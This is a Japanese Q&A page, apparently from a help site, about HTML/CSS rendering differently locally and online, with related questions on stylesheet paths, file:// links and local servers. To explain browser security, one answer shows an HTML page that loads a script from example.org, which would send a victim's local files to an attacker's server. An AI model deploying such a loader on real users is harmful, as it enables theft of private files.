【復活求む!】惜しくも解散してしまったバンド|J-ROCK編 >>

Dreamweaver mx2004で
制作を行っております。
主に(x)html + css
で制作しております。

htmlファイルで保存を行い、
ローカル上(デスクトップ)で
ファイルを開くとおかしな表示に
なっていることがあります。
※おかしな…というのはレイアウトが崩れていたり、
 バナーが意図しているところと違う位置に
 なったりします。


それらをサーバーにアップロードして
インターネット上で見るとただしく表示されています。
特にテーブルを使わないで制作を行った時ほど顕著です。
自分としては
今まで、ローカルとネット上は環境が違うから
と、ネットで正しく見えていればOKと考えて
いました。

なぜそうなるのか?
と言われた時に、うまく伝えることができずに
困っております。
よい説明があればお教えください。

※もしくは、ローカルとネット上、両方同じように
見えるのが普通だということであれば
ご指摘ください。

このQ&Aに関連する最新のQ&A

A 回答 (4件)

それでは、cssファイルが、絶対パスで記述されていませんか?


常時接続でないとか?
ローカルではhttp://が開けなく、cssファイルが開けないとか
画像ファイルが開けないとか……

普通は、ローカルもネット上も同じに見えるはずです。ローカルは正しいのにアップすれば、崩れるという場合は、借りているサーバーが広告を自動で入れているからとか、勝手に書き換えられるので崩れる場合はあります。

しかし、今回のように、ローカルが変で、ネット上はOKというのはあまり考えられません。無理やり思いついたのが、上のようなことです。

ブラウザ間で違う事もよくありますが、今回は当てはまらないですね。
    • good
    • 2

ローカル上で見ているソフトと、ネット上でみているソフトは同じ物ですか?


例:ローカルはDreamweaver mx2004。ネット上はIEってことはないですか?

この回答への補足

例えば、ローカルでhtmlファイルをひらくと
思いっきり左によってたり、
画像表示されるべきものがされていなかったり。
でもネットにあげると、指示通り表示されます。

ローカルでhtmlファイルひらくときは、
自動的にIEでひらきます。だからネット上と
同じだと思いますが…。

補足日時:2007/12/28 10:34
    • good
    • 0

2段組とかのレイアウトが崩れるということでしたら


幅の計算ができていないということではないでしょうか。
具体的な症状を書いてくれないとこれ以上はわかりません(ーー;)

あと、MX2004だと逆のケースも存在します。
clearfixを入れるとブラウザは平気だけど、Dreamweaver上ではぐちゃっとなってしまいます。

この回答への補足

例えば、ローカルでhtmlファイルをひらくと
思いっきり左によってたり、
画像表示されるべきものがされていなかったり。
でもネットにあげると、指示通り表示されます。

ローカルでhtmlファイルひらくときは、
自動的にIEでひらきます。だからネット上と
同じだと思いますが…。

補足日時:2007/12/28 10:41
    • good
    • 0

スタイルシートが反映されてないようなレイアウトの崩れ方でしょうか?



経験上考えられるのは
たとえばスタイルシート(CSS)の記述
<link rel="stylesheet" type="text/css" href="./style.css"/>
この部分の最後の部分 ./style.css というスタイルシートファイルへのパスが変わってしまっているからではないでしょうか?
そのためスタイルシートを読み込んでいないという感じがします。

ソフトウエアによっては
C:\Documents and Settings\~~~
になっていたり
./style.css (相対パス)や
http://●●●.com/style.css(絶対パス)になってたりします

ローカル上、ネット上、それぞれのhtmlソースを見比べてみてはいかがでしょうか?
またファイルの指定先がそれぞれの環境に適合しているか 確認してみてください

この回答への補足

残念ながら、パス違いはなさそうです。

補足日時:2007/12/28 10:43
    • good
    • 0

このQ&Aに関連する人気のQ&A

お探しのQ&Aが見つからない時は、教えて!gooで質問しましょう!

このQ&Aを見た人はこんなQ&Aも見ています

このQ&Aを見た人が検索しているワード

このQ&Aと関連する良く見られている質問

QローカルとWeb上で見え方が違うのですが…。

こんにちは。

Webサイトを製作しているものです。今朝下記のような質問をしてしまったものです。

// 以下、引用-----------------------

題名:CSSが間違ってデザイン崩れ困っています


こんにちは。

http://oshiete.goo.ne.jp/qa/7315867.html で質問したものです。お世話になりました。

回答者のみなさんのアドバイスを参考に頑張っていたのですが、どうしてもデザインが崩れてしまいます。あげく、IE系(それを利用するSleipnir)以外はキチンとコンテナの外枠が表示されたのですが、IE系(それを利用するSleipnir)は100%で線が止まり、何とこれ100%以上、下に行けなくなりました。ただし中のコンテンツが何故か<object>化されたみたいになりスクロールが出来るようになったので、コンテンツは見ることが出来ます。

よく考えてみたのですが、私がfloatをする理由は無いように思われました。5~6年前に興味本位でfloatを利用しただけで、上記質問 http://oshiete.goo.ne.jp/qa/7315867.html のORUKA1951さんの仰る、
>> 例えば絶対配置による方法では、HTMLを記述する上で内容の配置順序が自由になることが回り込ませるボックスを先に記述する必要がある回り込みによる方法よりも優れている

ということは何も考えずに適当にfloatを利用していたのです。ですのでfloatを利用しない方法で移行に行こう(苦笑)と考え始めています。

ですが、肝心のhtmlファイルの中身が、

・3ペインの右側
・3ペインの真ん中
・3ペインの左側

と言う順序で書かれています。これを、

・3ペインの左側
・3ペインの真ん中
・3ペインの右側

と言う風にhtmlを巧く書き換えるフリーウェアがあるのかどうかというのを困っています。htmlファイルは確かに500ページ程と多いのですが、良いことに全て同じ構造(3ペインの順番等)になっています。私は『grep』というのでしょうか、その様なUNIXの知識は全くないので、フリーウェアを利用するしかないと考えています。ですが、どのフリーウェアを利用したらいいのかが『窓の杜』、『vector』を見ても分かりませんでした。

ここのカテゴリではもしかしたらカテゴリ違いかもしれませんが、この悩みの解決法、ご教示願えないでしょうか?

教えて君になっていることは重々承知しておりますが、昨日一日これで悩んで全く解決致しませんでした。

何卒よろしくお願い申し上げます。

失礼致します。

// 以上、引用-----------------------


1つのファイルを上記のようにやって、floatを消してみたんですが段落ち(と言うのでしょうか!?)をしてしまいました(当然?)。上記、多分バカな質問だったと思います。
-----------------------
質問1: floatなしで要素を横に揃えることなんて無理ですよね?
-----------------------
現状、ローカルではファイルが色々と重すぎるのかIEでは表示されません。それでSleipnir3でローカルとWeb上で確かめたのですが、ローカルではキチンと要素の上下左右が線で囲まれているのですが、Web上のは上記の質問内の状態になっています。IEも同様にダメです。Firefox、Safari、Chrome、Operaでは実現できています。

-----------------------
質問2: なぜ同じブラウザ(Sleipnir)でWeb上とローカルとで見え方が違うことがあるのでしょうか?(ファイルはもちろん同じ内容です。)
-----------------------

以上、何かご意見がある方、よろしくお願いいたします。

失礼致します。

こんにちは。

Webサイトを製作しているものです。今朝下記のような質問をしてしまったものです。

// 以下、引用-----------------------

題名:CSSが間違ってデザイン崩れ困っています


こんにちは。

http://oshiete.goo.ne.jp/qa/7315867.html で質問したものです。お世話になりました。

回答者のみなさんのアドバイスを参考に頑張っていたのですが、どうしてもデザインが崩れてしまいます。あげく、IE系(それを利用するSleipnir)以外はキチンとコンテナの外枠が表示されたのですが、IE系(それを利用するSl...続きを読む

Aベストアンサー

>ページによっては左側、または右側の高さが一番高くなることがあるのですが、その場合の解決方法をご教示願えないでしょうか?
「高さを揃える css」で検索してみてください。私が先に挙げたカラムレイアウトの手法つまり、
float
position
table-cell
のすべてで左右のみならず、3コラムになってどのコラムが高くなっても高さを揃えたり、そろえているように見せることが出来ます。table-cellが一番簡単ですがね。

Qアップロードすると、スタイルシートが反映されない

外部にcssファイルを作り、
文字のみスタイルシートで制御します。
DREAMWEAVER上でスタイルシートは反映されています。
F12を押しても、スタイルシートは反映されています。
しかし、フォルダからhtmlファイルを直接ひらいたり、
アップロードしたファイルをみると、
スタイルシートが反映されていません、
もちろん、cssファイルも一緒にアップロードしてます。
DREAMWEAVER4を使っています。

なんでだか、わかりません。。。
お手数かと思いますが、よろしくお願いします。

Aベストアンサー

こんばんわぁ、Blackwinglsです。

ちょっと心配になって動作確認してみました。

あれ、確かに思った通りの動作しませんねぇ・・・

でソースを良くみてみたらパスがチョットおかしいかも(^^;)

ソースの
<link rel="stylesheet" href="/textStyle.css" type="text/css">
の部分を
<link rel="stylesheet" href="./textStyle.css" type="text/css">
に変更して試してみてください。

恐らくhtmlファイルと同じ階層(フォルダ)にcssファイルをアップしてるんですよね。
最初の記述だとルートにcssファイルがあることになってしまうので・・・・・

ではでは~☆彡

QHTMLからフォルダを開きたい

いつも大変お世話になります<(_ _)>

Webサーバー上にあるWebページ(HTML)の中に、ローカルPCのフォルダを開くリンクを付けたいのですが、
<a href="file://c:\windows">OPEN</a>
としても、何も反応しません。

いろいろ調べたのですが、上記の方法しか見あたりません。

なお、ブラウザのアドレス欄に file://c:\windows と入力すると、フォルダの内容が表示されます。
※Firefoxだと、ファイルの一覧になりますが・・・

何か環境によって挙動が異なるのでしょうか?
それとも、セキュリティ上の観点から最近じゃ出来なくなっているのでしょうか?

是非ともお助け下さい。宜しくお願い致します。

Aベストアンサー

file:///C:/windows/
/は三つでは・・・
 IEの場合はエクスプローラ(ファイルマネージャ)が開くような・・・
 IEはファイルマネージャーと一体のブラウザなので・・・

★実は、ローカルサーバーが必要です。
 apacheでも何でも良いので、WEBデータの入っているフォルダーを
<VIRTUALHOST 127.0.0.1>
C:\Document and settings\my document\web
 とかに指定して、Windowsのhostsファイルで、適当なサーバー名を指定しておきます。
myLocalhost 127.0.0.1
とか・・・

 そうすると
http://myLoclahost/
 で開けます。

 

QHTMLで別PCのフォルダを開く

例えばネットワーク上に”192.168.100.250”というPCがあるとします。

このPCはフォルダウィンドウでフォルダ内を閲覧出来る場合、

別のサーバーのHTMLファイルから、

このフォルダを開く事は出来ますか?

以下のコードを追加して、testをクリックしても何も起こりません。。。

<a href="file:\\192.168.100.250\test">test</a>

どなたかお分かりになる方教えてください。

Aベストアンサー

[ANo.7] の続きね。

Firefox を例にするね。

■ ウェブブラウザのセキュリティ第1段階

1) Firefox でロケーションバーに "file:///c:/" を入力すると、『C:\』のフォルダの一覧が表示される。他のフォルダを入力すれば、同じように、そのフォルダの一覧が表示される。

2) 質問者さんは、悪意のあるウェブページとは知らずに、"http://example.org/akuinoaru.html" をダウンロードして、デスクトップに保存したとする。

その HTML の内容は↓これ。

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
  <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
  <title>Akuinoaru JavaScript Sample</title>
  <script type="text/javascript" src="http://example.org/akuinoaru.js"></script>
</head>
<body>
  <h1>Akuinoaru JavaScript Sample</h1>
  <div>
    <iframe id="iframe" width="100%" height="600" src="."></iframe>
  </div>
</body>
</html>

3) 質問者さんは、保存した HTML を Firefox で開くとする。

4) すると、デスクトップにあるファイルの一覧が表示される。

5) 『4)』とほぼ同時に "http://example.org/akuinoaru.js" が実行される。

6) akuinoaru.js は、表示されたフォルダの中にあるファイルを、
"http://example.org/akuinoaru.php" へ全て送信するという JavaScript だとする。

ということで、質問者さんの PC の中のファイルが、攻撃者のサーバに送信される。


つまり、『信頼できない HTML ファイルをダウンロードして、ウェブブラウザで開くのはすごく危険』ということ。


■ ウェブブラウザのセキュリティ第2段階

1) ウェブブラウザは、PC にウェブページのキャッシュを持つ。
つまり、自分でダウンロードしなくても、もともと HTML ファイルはダウンロードされているということ。

2) ここで、"http://example.org/akuinoaru.html" は "file:///ウェブページのキャッシュフォルダ/キャッシュファイル" へリンクを張ってあったとする(※)。

通常、このリンクはウェブブラウザによってセキュリティー上無効にされているけれど、これが有効だったとする。

3) 質問者さんは、上のページのリンクをクリックしたとする。

4) 以下、『ウェブブラウザのセキュリティ第1段階』の 『4)』と同じ。

今回は、リンクをクリックする想定をしたけど、実際はクリックしなくても、キャッシュファイルを表示させることができるから、悪意のあるページにアクセスしたら、すぐに、質問者さんの PC の中に保存されているファイルは、攻撃者のサーバに送信されてしまう。

このようなことが起こらないように、http://xxxxxx から file:/// へのリンクは無効にされている。


という説明で大丈夫かな?


※2) 実際には、キャッシュファイルのパスは固定じゃないから、JavaScript でがりがり生成して何回もトライしてキャッシュファイルのパスを見つける必要がある。でも危険なことには違いはない。

[ANo.7] の続きね。

Firefox を例にするね。

■ ウェブブラウザのセキュリティ第1段階

1) Firefox でロケーションバーに "file:///c:/" を入力すると、『C:\』のフォルダの一覧が表示される。他のフォルダを入力すれば、同じように、そのフォルダの一覧が表示される。

2) 質問者さんは、悪意のあるウェブページとは知らずに、"http://example.org/akuinoaru.html" をダウンロードして、デスクトップに保存したとする。

その HTML の内容は↓これ。

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional...続きを読む

Qローカル環境とネット環境でホームページの文字の大きさが違う

Weboxというツールを使って、あるウェブサイトをまるごとダウンロードしたのですが、InternetExploreを使って閲覧すると、ローカル環境とネット環境とで、文字の大きさが一部異なる箇所があります。
(Firefoxでは一致しています)
CSSファイルのリンクはちゃんとできているので、なぜ違いがおこるのかがさっぱりわからないです。
ウェブサーバ側でなにかしらの補修をしているくらいしか考えつかないのですが、そんなことってありえるでしょうか?
またそれ以外にどんな原因が考えられるでしょうか?

どうか宜しくお願いいたします。

Aベストアンサー

成る程、apraxasさんの環境では違いますね(^^;

今少し時間があったのでソースも簡単に観てみたんですが、やはり Dreamweaver 使用してます?

余計な事かもしれませんしこの件にどれほど関係があるかは判りませんが…
自分が知る限りは、どのHP作成ソフトもレイアウトの際にかなり強引なソースを吐きます。
折角 xthmlでCSSにしても、気をつけてないとインライン要素の中にブロックレベル要素を置いたりCSSがあるのにhtmlタグでレイアウトを辻褄併せしたり…といった無茶なソースになりますからレイアウトを決めた後にソースの検証・手直し等をして気を付けた方が良いかと(^^;

Dreamweaver でローカル検証するとオンとオフのレイアウトがずれる…という話を聞いた事ありますけど、apraxasさんは WeBox からの保存ですもんね…。
キャプチャーを見る限りはOSやIEも同じですしCSSが関係している事だから後は記述方法が何等か作用しているとしか理由が思いつかないですね。

今仕事場のPCなのでCSSファイルは確認出来ませんが…
この感じだと恐らくはCSSの<div class="white_background">部分のクラス内容の記述と html 上でその中の<span style="font-size: x-small">が原因でしょうね。

時間がまだあるなら、早く帰宅出来れば自分で判る範囲をもう少し確認してみますね。

成る程、apraxasさんの環境では違いますね(^^;

今少し時間があったのでソースも簡単に観てみたんですが、やはり Dreamweaver 使用してます?

余計な事かもしれませんしこの件にどれほど関係があるかは判りませんが…
自分が知る限りは、どのHP作成ソフトもレイアウトの際にかなり強引なソースを吐きます。
折角 xthmlでCSSにしても、気をつけてないとインライン要素の中にブロックレベル要素を置いたりCSSがあるのにhtmlタグでレイアウトを辻褄併せしたり…といった無茶なソースになりますからレ...続きを読む

Qcssが反映されません

FC2のホームページについてです。

ホームページはなんとか作れてサーバーにアップしたのですが、
style.cssで設定した背景画像とスクロールバーが反映されません><
テンプレートをお借りして、その中に入っていたstyle.cssもそのままffftpに
アップロードしました。

ファイル内で自分のホームページを見てみると背景画像と色など設定したスクロールバーは
しっかり反映されているのですが、サーバーにアップすると反映されません。

ffftpにstyle.cssをそのままアップロードしたのが間違いだったのでしょうか;;
検索して調べてみるとCSSのフォルダごとアップロードしろと書いてあったりするのですが
テンプレートに入っているのはstyle.cssというものだけで、cssフォルダは入っていません。
それともcssフォルダは自分で作るのですか><?

Aベストアンサー

とても忙しいのですが、少し時間が取れたのでサイト拝見しました。
本当にまだ初心者なのですね。
ちょっとショックかもしれませんが、ページを作成したら
★Another HTML-lint 5 ( http://www.htmllint.net/html-lint/htmllint.html )
 などでチェックするのがもっとも良いです。減点0の項目は宗教的なものもありますからこだわらなくて良いですが、減点数の書かれているものは治すと良いでしょう。
 Another HTML-lintは、厳しいですがなにが悪いかと、その解説や対策まで教えてくれるからとても勉強になります。

<DOCTYPE>の宣言がされていますが、今からはじめられるなら必ずstrictにするべきです。これは1999年のHTML4.01の勧告時に
『HTML文書を作る場合には、この仕様における、他のDTDセットではなく strict DTD に適合する文書を作るよう推奨する。 ( http://www.asahi-net.or.jp/%7Esd5a-ucd/rec-html401j/conform.html#h-4.1 )』とされて来たものです。多分参考にされている書籍かサイトは相当古いものだと思います。
 というか、まったく仕様書を知らない人が作られたテンプレートではないかな。Another HTML Lintを確認するまでもなく酷いものです。

 その後、そのままXML化されたXHTML1.0の後、XHTML1.1が勧告されましたが、XHTML1.1ではstrict以外はありません。【現在、勧告直前になっているHTML5は、HTML4.01strictの改訂で、transitinal的なものは一切ありません。】

 そして、HTML4.01で方向性は示されていたのですが、それがまったく徹底していなかった反省からHTML5は、完全に文書構造とプレゼンテーション(表現)は分離されます。たとえば、
「構造とプレゼンテーションの分離 ( http://www.asahi-net.or.jp/%7Esd5a-ucd/rec-html401j/intro/intro.html#h-2.4.1 )」
「単に文書内容を整形する目的だけで表を用いるべきでない。 ( http://www.asahi-net.or.jp/%7Esd5a-ucd/rec-html401j/struct/tables.html#h-11.1 )」
★<DOCTYPE>はおまじないなんかじゃありません。仕様書にきちんと書かれているルールです。これはブラウザ(IE)を標準モードで起動させるスイッチにもなっています。
→DOCTYPEスイッチ - Google 検索 ( https://www.google.co.jp/#hl=ja&safe=off&sclient=psy-ab&q=DOCTYPE%E3%82%B9%E3%82%A4%E3%83%83%E3%83%81&oq=DOCTYPE%E3%82%B9%E3%82%A4%E3%83%83%E3%83%81&gs_l=hp.3..35i39j0.254219.263038.2.263743.24.19.5.0.0.0.330.2992.0j18j0j1.19.0...0.0...1c.1.ix0-Vuoh6Ac&psj=1&bav=on.2,or.r_gc.r_pw.r_qf.&fp=769cfc6a4773dbdc&biw=1024&bih=619 )

 実は、DOCTYPEの宣言以上にあなたのサイトは、この点で誤りだといえます。厳しいですが、これは今後は絶対に守らなければならない条件の一つです。詳しくは
・スタイルシートの概説 ( http://www.asahi-net.or.jp/%7Esd5a-ucd/rec-html401j/present/styles.html#h-14.1 )
 など。

たぶん携帯やスマートホンを想定されたページだと思います。
本来は下記サンプルのようにシンプルなものであるはずです。
iframeはstrictでは使えませんので、objectを使っています。
そのため、targetは同様に使えませんので、それぞれのページにこのソースを書く方が良いです。
 →FRAME 問題 HTML - Google 検索 ( https://www.google.co.jp/#hl=ja&safe=off&output=search&sclient=psy-ab&q=FRAME+%E5%95%8F%E9%A1%8C+HTML&oq=FRAME+%E5%95%8F%E9%A1%8C+HTML&gs_l=hp.3..0i8i10i30j0i8i30.2515.15781.1.16360.23.20.3.0.0.0.408.3490.0j15j3j1j1.20.0...0.0...1c.1.Jvj_QaC4uiM&psj=1&bav=on.2,or.r_gc.r_pw.r_qf.&fp=769cfc6a4773dbdc&biw=1024&bih=619 )


★Anothe HTML Lint
★W3C CSS 検証サービス ( http://jigsaw.w3.org/css-validator/#validate_by_input )
でテスト済み
(注意) タブは_に置換してあるので戻すこと!!!

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="ja">
<head>
_<meta http-equiv="content-type" content="text/html; charset=Shift_JIS">
_<meta http-equiv="Content-Script-Type" content="text/javascript">
_<title>pochette</title>
_<meta http-equiv="Content-Style-Type" content="text/css">
_<link rel="stylesheet" type="text/css" media="screen" href="./test.css">
_<style type="text/css">
<!--
-->
_</style>
</head>
<body>
<!-- ここから -->
_<div class="header">
__<h1>*pochette*</h1>
_</div>
<!-- ここまではすべてのページで共通 -->
_<div class="section">
__<h2>本文</h2>
__<p><object data="./main.html">新着情報は<a href="./main.html">新着情報</a>へ</object></p>
__<div class="Navigation">
___<ul>
____<li><a href="main.html">Top</a></li>
____<li><a href="about.html">About</a></li>
____<li><a href="material.html">Material</a></li>
____<li><a href="bbs.html">BBS</a></li>
____<li><a href="link.html">Link</a></li>
___</ul>
__</div>
__<p><img src="./g8.png" height="273" width="250" alt=""></p>
_</div>
<!-- ここから -->
_<div class="footer">
__<address>Copyright (c) 2012 *pochette* All Rights Reserved.</address>
<!-- ここまではすべてのページで共通 -->
<script type="text/javascript"><!--
この部分はFC2自動挿入なので省略
-->
</script>
_</div>
</body>
</html>

[CSS]
@charset "Shift_Jis";
html,body{margin:0;padding:0;}
body{
_color: #808080;
_font-family: 'Osaka,verdana';
_font-size: 10px;
_letter-spacing: 1px;
_line-height: 12pt;
_text-align:center;
}
div.header,div.section,div.footer{
width:30%;min-width:320px;
margin:0 auto;
}
div.section object{width:300px;height:200px;}
a:link{color: #808080;}
a:hover {color: #FF8040;}
h1,div.Navigation{
background-image: url("./cccc12.png");
}
div.section div{margin:20px

とても忙しいのですが、少し時間が取れたのでサイト拝見しました。
本当にまだ初心者なのですね。
ちょっとショックかもしれませんが、ページを作成したら
★Another HTML-lint 5 ( http://www.htmllint.net/html-lint/htmllint.html )
 などでチェックするのがもっとも良いです。減点0の項目は宗教的なものもありますからこだわらなくて良いですが、減点数の書かれているものは治すと良いでしょう。
 Another HTML-lintは、厳しいですがなにが悪いかと、その解説や対策まで教えてくれるからとても勉強になりま...続きを読む

Q社内で利用するWebサイトを立ち上げるには?

プログラムは初心者ではありませんがWeb、サーバーなどは初心者です。
必要な事として何を行えばいいのか教えてください。
環境設定などの開発の準備段階で悩んでいます。

やりたいことは
・社内ローカルネットで複数人に対してWebサイトを公開
・社内サーバー?によるファイルの共有

整えなければいけない環境として何があげられるのでしょうか?
いろいろと調べるとオンラインに公開するための手順見つかるのですがローカルでとなるとどこまでを参考にすればいいのか分からず困っています。

.htmlファイルを作成してそれを編集しWebでレイアウトなどを見るといったことはわかります。
そのファイルなどをどうしたら周りと共有できるようになるのでしょうか?

整えるべき環境、作業の手順などとっかかりの部分を教えてください。
また、ローカルでWebを作成し公開していく方法が書かれたサイトなどを知っている方は教えてください。

Aベストアンサー

はじめに、基本的にwebページの公開ははじめに内部で製作 > 完成したら外部に公開する設定にするという手順で進むので、2つ目の工程を踏まなければ自動的に内部限定での公開となります。以下必要なものと簡単な手順です。

【ハードで必要なもの】
・サーバー(普通の古いノートPCでもいい)
・市販のルーター

【ソフトで必要なもの】
・ネットワークの基本的な知識(CCNA1程度)
・osがwinならXAMPPというパッケージソフトを入れれば一気にサーバーが出来上がります
・XAMPP使わないならLPIC1程度のLinuxの知識
・webサーバー扱うのでApacheに関する知識

【手順】
1. サーバーのIPを固定します。
2. 一応ルーターでポート解放されていないか確認and心配ならwebサーバーの設定で外部からはアクセス出来ないようにする。
3. webサーバーを立ち上げます(=Apacheを立ち上げます)
4. webサーバーで設定している公開ディレクトリにhtmlファイルを置きます。
5. あとは普通に同一ネットワーク内の他のPCからブラウザのURLバーにIP入れてアクセスすればOK
6. もしもhttp://localnet.comなどのホスト名でアクセスさせたいなら、各PCのhostファイルか、社内のDNSにその情報を登録。

はじめに、基本的にwebページの公開ははじめに内部で製作 > 完成したら外部に公開する設定にするという手順で進むので、2つ目の工程を踏まなければ自動的に内部限定での公開となります。以下必要なものと簡単な手順です。

【ハードで必要なもの】
・サーバー(普通の古いノートPCでもいい)
・市販のルーター

【ソフトで必要なもの】
・ネットワークの基本的な知識(CCNA1程度)
・osがwinならXAMPPというパッケージソフトを入れれば一気にサーバーが出来上がります
・XAMPP使わないならLPIC1程度のLinuxの知識
・we...続きを読む

Qテーブル内の文字サイズを変更したい。

HTMLのテーブル内の文字サイズを変更したいのですが。
イマイチ上手くいかずに悩んでいます。
出来れば全体的に<TABLE></TABLE>のほうでいじれますか?
<TD>タグや<TR>タグのところでいじくるのですか?

Aベストアンサー

いろいろやり方はありますが
文字単位でサイズを変更するには
#2の方法ですね。

テーブルごとやセル(<TD>)ごとにサイズを変更するには
スタイルシート(CSS)を使用します。

テーブルごとにサイズを変更する場合
<TABLE style="font-size : 20px;">

セル(<TD>)ごとにサイズを変更する場合
<TD style="font-size : 20px;">あああ</TD>

#1の方法だとページ内の全てのセル(<TD>)に設定することになります。

スタイルシート(CSS)はこれら以外にも
いろいろな設定方法があります。

Qスタイルシート(CSSスタイル)が読み込めない。

Webデザイナー修行中の者です。

社内の人が作ったホームページ。背景や線の画像を各
ページで統一するため、ソースをコピー&ペーストして
新たなページを作ったのですが、作成の時点では線画像も
背景も表示されるのですが、ブラウザで見てみると背景も
線も出ません。
おそらくスタイルシートというもの(CSSスタイル)が
読み込めていないのだと思いますが、考えられる原因は
どんなものでしょう?
作成者に聞けばいいのでしょうが、いないので聞くことが
できません。
かといって、大幅にページを変更する時間もなく、私が
作るページだけを全く別の背景等にするのも、不自然な
ものになってしまいます。
業務にかかわるものですので、Webページやタグを公開
できないのですが、アドバイス、よろしくお願いいたし
ます。

作成はメモ帳、またはDreamweaver4を使用しています。

Aベストアンサー

No1です。
えと、あなたのPCにサイトの全データがあるわけではないのですね。
だったらそのPC上では確認できないかもしれませんね。
方法としては、言われるとおりアップして確認する方法。
もう1つはCSSファイルをDLし、サイトと同じ階層構成を作り上げることです。
<link rel="stylesheet" href="../catalog/stylesheet.css" type="text/css">
の場合は、保存してあるフォルダの1つ上に「catalog」というフォルダを作り、そこにDLした「stylesheet.css」を配置しブラウザで確認してください。
ちゃんとCSSが認識されるはずです。

Qテーブルの表示がずれます

htmlを書いているのですが、テーブルの行を増やすたびに、ブラウザで表示するとテーブルの表示がだんだん下の方へずれてしまいます。友人に聞いたところ、彼も同じような現象が起こるようです。
このようにならないようにしたいのですが、専門書を読んでも分かりません。
ちなみにhtmlソースはこのようになっております。
(1)行が1つの場合
<html>
<head>
<title>テスト</title>
</head>
<body bgcolor = "white">

<h1>テスト</h1>
<h3>テスト1</h3>
<table>
  <tr>
   <td>テスト</td>
   <td>1</td>
   <td>2</td>
  </tr>
</table>
</body>
</html>

(2)行が2つの場合
<html>
<head>
<title>テスト</title>
</head>
<body bgcolor = "white">

<h1>テスト</h1>
<h3>テスト2</h3>
<table>
  <tr>
   <td>テスト</td>
   <td>1</td>
   <td>2</td>
  </tr>
<tr>
   <td>テスト</td>
   <td>1</td>
   <td>2</td>
  </tr>
</table>
</body>
</html>
宜しくお願い致します。

htmlを書いているのですが、テーブルの行を増やすたびに、ブラウザで表示するとテーブルの表示がだんだん下の方へずれてしまいます。友人に聞いたところ、彼も同じような現象が起こるようです。
このようにならないようにしたいのですが、専門書を読んでも分かりません。
ちなみにhtmlソースはこのようになっております。
(1)行が1つの場合
<html>
<head>
<title>テスト</title>
</head>
<body bgcolor = "white">

<h1>テスト</h1>
<h3>テスト1</h3>
<table>
  <tr>
   <td>テスト</td>...続きを読む

Aベストアンサー

こんにちは。
イマイチどうしたいのかがよく判らないので、具体的な説明を補足してください。
ソース自体は間違いではないと思いますが…。
<tr>や<td>の前にある空白はもちろん半角空白ですよね?全角だと不具合がでます。

行が増えると下に表が大きくなるのは必然ですし。
行が1行のものと、2行のものとでは、ページが違うんですよね?
もし、同じページに表示するのであれば、1ページにつき、<html>タグは一組です。(あくまでも基本的に、ですが)
これが、直接行がずれるっていうことにはならないと思いますけど…。


このQ&Aを見た人がよく見るQ&A

人気Q&Aランキング